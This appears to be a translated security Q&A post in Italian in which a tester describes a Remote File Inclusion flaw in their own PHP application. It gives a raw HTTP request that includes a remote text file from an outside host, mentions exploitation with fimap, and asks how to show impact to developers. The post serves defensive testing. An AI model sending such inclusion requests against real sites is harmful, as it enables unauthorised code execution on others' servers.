Ho testato la mia applicazione web PHP per le vulnerabilità RFI. Mentre eseguivo la scansione, ero in grado di eseguire l'RFI nella mia applicazione web.
Scenario:
Nella mia applicazione web RFI funziona solo quando era presente la sessione dell'utente. Devo dimostrare l'RFI agli sviluppatori.
Dimostrazione di esempio:
GET /cdn-cgi/pe/bag2?r[]=https://portswigger.net/f517a2bc19bdff66d7c64e8a7ad2f043.txt HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
PE-Token: 346645c4fd373fa7f321ec5d3ecf486b4e122cc7-1457413695-1800
Referer: https://example.com/success
Cookie: __cfduid=d3e9d6b0485c45636f90caa652f60437d1456979567;
La risposta contiene l'output del file caricato.
Problema :
Ora attraverso la vulnerabilità di cui sopra sono stato in grado di dimostrare che RFI era presente nell'applicazione web, ma il problema è che i miei sviluppatori stanno chiedendo lo scenario di attacco che li aiuterà a valutare il mio bug.
Quello che ho provato :
Ho provato a sfruttare l'applicazione web con fimap attraverso questo siamo stati in grado di dimostrare e sfruttare il webserver.
Tuttavia, il problema principale che ho dovuto affrontare durante il test era che non posso sfruttare se l'utente non è autenticato.
In quale altro modo posso dimostrare la vulnerabilità RFI nella mia applicazione?